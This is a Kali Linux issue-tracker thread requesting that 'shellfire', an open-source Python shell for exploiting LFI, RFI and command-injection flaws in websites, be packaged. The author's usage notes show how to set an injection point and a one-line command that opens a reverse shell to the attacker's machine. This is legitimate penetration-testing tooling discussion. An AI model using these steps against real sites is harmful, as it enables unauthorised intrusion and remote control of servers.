View Issue Details

IDProjectCategoryView StatusLast Update
0003694Kali Linux[All Projects] Queued Tool Additionpublic2020-06-17 14:58
Reporterunix-ninja Assigned To 
PrioritynormalSeverityminorReproducibilityN/A
Status acknowledgedResolutionopen 
Product Version 
Target VersionFixed in Version 
Summary0003694: shellfire
DescriptionI recently open sourced a tool I developed during OSCP labs: shellfire.

The tool is used for exploiting LFI,RFI, and command injection vulnerabilities in web sites. It is written in python (to be portable and easy to modify), and contains a wealth of features, including support for SSL/TLS, cookies, POST method, connection upgrade to reverse shell on Linux systems, and an embedded web server to host exploits for RFI.

The purpose of this tool was to create an easy to use alternative to some of the more complex options.

This tool is released with a BSD license to make it super flexible to use.

Source code is available on github: https://github.com/unix-ninja/shellfire

Activities

g0tmi1k

2018-01-29 15:13

administrator   ~0008470

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):

- [Name] - The name of the tool
- [Version] - What version of the tool should be added?
--- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
- [Homepage] - Where can the tool be found online? Where to go to get more information?
- [Download] - Where to go to get the tool?
- [Author] - Who made the tool?
- [Licence] - How is the software distributed? What conditions does it come with?
- [Description] - What is the tool about? What does it do?
- [Dependencies] - What is needed for the tool to work?
- [Similar tools] - What other tools are out there?
- [How to install] - How do you compile it?
- [How to use] - What are some basic commands/functions to demonstrate it?

unix-ninja

2018-01-30 01:45

reporter   ~0008558

[Name]
 shellfire

[Version]
 0.4

[Git commit]
 063a89e57d3c7e723c9223c723e8d68459f900a5

[Download]
 https://github.com/unix-ninja/shellfire

[Author]
 unix-ninja

[Licence]
 BSD 2-clause (do whatever you'd like with it!)

[Description]
 shellfire is an interactive exploitation shell which focuses on exploiting LFI, RFI, and command injection vulnerabilities. The shell is meant to be extremely light-weight with minimal dependencies. All that should be needed is a standard Python 2.7 installed and the Python Requests library.

[Dependencies]
 Python 2.7
 Python Requests

[Similar tools]
 commix

[How to install]
 No compilation is necessary; shellfire is contained in a single Python file. Just mark the file executable and run it:
$ chmod +x shellfire.py
$ ./shellfire.py

 Alternatively, you can just call it using the interpreter directly:
$ python shellfire.py

[How to use]
 Once the shell is open, you may enter commands as you would in your regular shell. These commands will be encoded and sent to the target for execution. Any command starting with a dot will be interpreted as an internal command by shellfire and will not be sent to the target.

 At any time, you can type ".help" to get information on the internal commands available.

 Before exploitation, you need to set the target URL to exploit. Provide shellfire with the exploitable URL, but replace the injection point with "%CMD%". For instance:

 >> .url http://example.com/home?dangerous_var=%CMD%

 Now you can just run commands as if you had local access:

 >> whoami

 For Linux machines, shellfire also attempts to automate the process of opening a reverse shell and listener using the ".shell" internal command. After setting the target, do something like the following to open a reverse shell to your machine on port 4444 (192.168.1.10 in this example):

 >> .shell 192.168.1.10 4444

 shellfire provides several additional internal commands which include setting the HTTP method, setting cookies, changing the UserAgent provided to the remote, setting HTTP auth credentials for password protected pages, automating phpinfo exploitation, etc...

g0tmi1k

2018-01-30 10:17

administrator   ~0008568

Could you git tag it's release for v0.4?

unix-ninja

2018-01-30 15:07

reporter   ~0008583

Sorry about that. I have just tagged release 0.4 on github. You should be able to see that now.

g0tmi1k

2020-03-30 14:36

administrator   ~0012565

@kali-team, please could this be packaged up.
@author, If you want to help the packaging process, you can check the documentation here ~ https://www.kali.org/docs/development/public-packaging

unix-ninja

2020-05-22 15:12

reporter   ~0012820

Hey @g0tmi1k, sorry for the delay. With cornoavirus it got a bit crazy over here.

I managed to get some time in the past day to look at your documentation. I think I got this right (it builds a package which seems to install fine on the latest Kali). I made a fork on Gitlab for the packaged version (let me know if this was not correct.)
https://gitlab.com/unix-ninja/shellfire

Issue History

Date Modified Username Field Change
2016-10-25 22:17 unix-ninja New Issue
2018-01-29 15:13 g0tmi1k Note Added: 0008470
2018-01-30 01:45 unix-ninja Note Added: 0008558
2018-01-30 10:17 g0tmi1k Note Added: 0008568
2018-01-30 15:07 unix-ninja Note Added: 0008583
2018-02-21 09:35 g0tmi1k Product Version 2016.2 =>
2020-03-30 14:36 g0tmi1k Note Added: 0012565
2020-03-30 14:36 g0tmi1k Status new => acknowledged
2020-03-30 14:36 g0tmi1k Category New Tool Requests => Queued Tool Addition
2020-05-22 15:12 unix-ninja Note Added: 0012820
2020-06-17 14:58 g0tmi1k Severity feature => minor